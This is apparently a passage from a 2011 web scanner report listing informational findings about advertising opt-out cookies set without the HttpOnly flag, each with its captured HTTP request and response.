GET /nai/daa.php?action_id=4&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=687446498 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=687446498; atdemo=a3ZoYXNyYz05O2t2cj01MDA=; ATTACID=a3Z0aWQ9MTdicjEybTFpMGtyOTU=; ANRTT=; TData=50014|50213|53575|53770|53823|56856|57587|58839|60145|60506|60548; N=2:d41d8cd98f00b204e9800998ecf8427e,33d93519227d7fc0c737bf49aa17226a; ATTAC=a3ZzZWc9NTAwMTQ6NTAyMTM6NTM1NzU6NTM3NzA6NTM4MjM6NTY4NTY6NTc1ODc6NTg4Mzk6NjAxNDU6NjA1MDY6NjA1NDg=; eadx=x

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: atdemo=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: atdemo=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: atdemo=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: atdemo=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: ATTACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: ATTACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: ATTACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: ATTACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: ANRTT=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: ANRTT=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: ANRTT=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: ANRTT=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: TData=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: TData=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: TData=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: TData=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: N=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: N=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: N=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: N=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: ATTAC=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: ATTAC=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: ATTAC=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: ATTAC=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: eadx=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: eadx=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: eadx=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: atdses=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: atdses=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: atdses=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: atdses=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: atdses=O;expires=Thu, 06-Nov-2036 13:53:52 GMT;domain=atwola.com;path=/
Location: http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=2&participant_id=2&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


6.37. http://notrack.adviva.net/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.adviva.net
Path:   /CookieCheck.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CookieCheck.php?optThis=1 HTTP/1.1
Host: notrack.adviva.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:44 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: ADVIVA=deleted; expires=Sat, 13-Nov-2010 18:53:43 GMT; path=/; domain=.adviva.net
Set-Cookie: ADVIVA=NOTRACK; expires=Fri, 11-Nov-2016 18:53:44 GMT; path=/; domain=.adviva.net
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Location: http://notrack.adviva.net/CookieCheck.php?refreshCheck=1&optThis=1
Content-Length: 0
Connection: close
Content-Type: text/html


6.38. http://notrack.specificmedia.com/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificmedia.com
Path:   /CookieCheck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CookieCheck.php?optThis=1&result=optout_success HTTP/1.1
Host: notrack.specificmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: ADVIVA=NOTRACK; expires=Fri, 11-Nov-2016 18:53:47 GMT; path=/; domain=.specificmedia.com
P3P: policyref="http://notrack.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Location: http://notrack.specificmedia.com/CookieCheck.php?refreshCheck=1&optThis=1&result=optout_success
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


6.39. http://oo.afy11.net/NAIOptOut.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oo.afy11.net
Path:   /NAIOptOut.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NAIOptOut.aspx?nocache=0.7163187 HTTP/1.1
Host: oo.afy11.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=1,2*4e62cac9*sFHmM92-82*aKPj71Zsi6DAbl_rJvyOOzXGnw==*; a=AAAAAAAAAAAAAAAAAAAAAA; __qca=P0-1177288715-1316025191253

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /NAIConfirm.aspx
Server: Microsoft-IIS/7.5
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
X-AspNet-Version: 4.0.30319
Set-Cookie: a=AAAAAAAAAAAAAAAAAAAAAA; domain=afy11.net; expires=Sat, 13-Nov-2021 00:00:00 GMT; path=/
Set-Cookie: f=; domain=afy11.net; expires=Sat, 13-Nov-2010 00:00:00 GMT; path=/
Set-Cookie: c=; domain=afy11.net; expires=Sat, 13-Nov-2010 00:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 13 Nov 2011 18:54:25 GMT
Content-Length: 133

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/NAIConfirm.aspx">here</a>.</h2>
</body></html>

6.40. http://open.ad.yieldmanager.net/V1/NWSetter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://open.ad.yieldmanager.net
Path:   /V1/NWSetter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /V1/NWSetter?nwid1=20072115599&url=http://info.yahoo.com/nai/nai-verify.html?optoutverify=true%26opter=nai&XTS=1321210423&XSIG=0~d5fc1b609f1ce455e216ef1819125ff12eafa53b HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii&t=291

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: XO=y=1&t=316&v=3&yoo=0&nwid1=20072115599&XTS=1321210426&XSIG=sczL5sUyAl9Hat7ItQrUJILgr5o-;path=/; expires=Tue, 13-Nov-2013 20:00:00 GMT;domain=.yieldmanager.net
Location: http://info.yahoo.com/nai/nai-verify.html?optoutverify=true&opter=nai
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8
Cache-Control: private
Content-Length: 808

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...

6.41. http://optout.33across.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.33across.com
Path:   /api/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/?action=opt-out HTTP/1.1
Host: optout.33across.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_nc=33Across+Optout

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Tue, 01 Jan 1980 1:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:46 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_nc=33Across+Optout; expires=Wed, 10-Nov-2021 18:53:46 GMT; path=/; domain=.33across.com
Location: http://optout.33across.com/api/?action=verify
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8


6.42. http://optout.adlegend.com/nai/optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.adlegend.com
Path:   /nai/optout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout.php?action=setcookie HTTP/1.1
Host: optout.adlegend.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:06 GMT
Server: Apache/2.2.16 (Unix) PHP/5.3.3
X-Powered-By: PHP/5.3.3
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Sun, 24 Oct 2010 01:00:00 GMT
Set-Cookie: ID=OPT_OUT; expires=Fri, 11-Nov-2016 18:54:06 GMT; path=/; domain=.adlegend.com
Set-Cookie: PrefID=deleted; expires=Sat, 13-Nov-2010 18:54:05 GMT; path=/; domain=.adlegend.com
Set-Cookie: CSList=deleted; expires=Sat, 13-Nov-2010 18:54:05 GMT; path=/; domain=.adlegend.com
Location: /nai/optout.php?action=readcookie
Content-Length: 0
Content-Type: text/html


6.43. http://optout.crwdcntrl.net/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2011 18:53:49 GMT
Server: Apache/2.2.21 (EL)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 01-Dec-2079 22:07:56 GMT; Path=/
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


6.44. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.doubleclick.net
Path:   /cgi-bin/dclk/optoutnai.pl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/dclk/optoutnai.pl HTTP/1.1
Host: optout.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; rsi_segs=

Response

HTTP/1.1 302 Redirect
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 208
Content-Type: text/html
Location: http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl?action=test&state=opt_out
Server: Microsoft-IIS/6.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR FIN INT DEM STA POL HEA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: id=OPT_OUT; domain=.doubleclick.net; path=/; expires=Wednesday, 09-Nov-2030 23:59:00 GMT
X-Powered-By: ASP.NET
Date: Sun, 13 Nov 2011 18:53:43 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl?action=test&amp;state=opt_out">here</a
...[SNIP]...

6.45. http://optout.imiclk.com/cgi/optout.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.imiclk.com
Path:   /cgi/optout.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi/optout.cgi?nai=1&nocache=0.7203638 HTTP/1.1
Host: optout.imiclk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=0; IMI=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://optout.imiclk.com/cgi/nai_status.cgi?oo=1&rand=1321210422
Date: Sun, 13 Nov 2011 18:53:42 GMT
Connection: close
Set-Cookie: OL8U=0; expires=Wed, 10-Nov-2021 18:53:42 GMT; path=/; domain=imiclk.com
Set-Cookie: IMI=OPT_OUT; expires=Wed, 10-Nov-2021 18:53:42 GMT; path=/; domain=imiclk.com
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"


6.46. http://optout.mookie1.decdna.net/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decdna.net
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.decdna.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2edecdna%2enet/%2f/1/o=0/cookie; NSC_pqupvu_efdeob_qppm_iuuq=ffffffff0941322045525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: %2edecdna%2enet/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:18 GMT; path=/; domain=.decdna.net
Set-Cookie: NSC_pqupvu_efdeob_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:18 GMT; path=/; domain=.decdna.net
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:18 GMT; path=/; domain=.decdna.net
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:18 GMT; path=/; domain=.decdna.net
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:18 GMT; path=/; domain=.decdna.net
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:18 GMT; path=/; domain=.decdna.net
Set-Cookie: %2edecdna%2enet/%2f/1/o=0/cookie; expires=Sat, 09-Nov-2024 18:54:19 GMT; path=/; domain=.decdna.net
Location: http://optout.mookie1.pm14.com/optout/nai/?action=optout
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



6.47. http://optout.mookie1.decideinteractive.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decideinteractive.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.decideinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_pqupvu_efdeobjou_qppm_iuuq=ffffffff0941322345525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: NSC_pqupvu_efdeobjou_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:09 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:09 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:09 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: %2edecideinteractive%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:09 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:09 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:09 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: %2edecideinteractive%2ecom/%2f/1/o=0/cookie; expires=Sat, 09-Nov-2024 18:54:10 GMT; path=/; domain=.decideinteractive.com
Location: http://optout.mookie1.decdna.net/optout/nai/?action=optout
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



6.48. http://optout.mookie1.dtfssearch.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.dtfssearch.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.dtfssearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_pqupvu_eugttfbsdi_qppm_iuuq=ffffffff0941322b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: NSC_pqupvu_eugttfbsdi_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:31 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:31 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:31 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: %2edtfssearch%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:31 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:31 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:31 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: %2edtfssearch%2ecom/%2f/1/o=0/cookie; expires=Sat, 09-Nov-2024 18:54:32 GMT; path=/; domain=.dtfssearch.com
Location: http://optout.b3.mookie1.com/optout/nai/?action=optout
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



6.49. http://optout.mookie1.pm14.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.pm14.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.pm14.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_pqupvu_qn14_qppm_iuuq=ffffffff0941322845525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: NSC_pqupvu_qn14_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:22 GMT; path=/; domain=.pm14.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:22 GMT; path=/; domain=.pm14.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:22 GMT; path=/; domain=.pm14.com
Set-Cookie: %2epm14%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:22 GMT; path=/; domain=.pm14.com
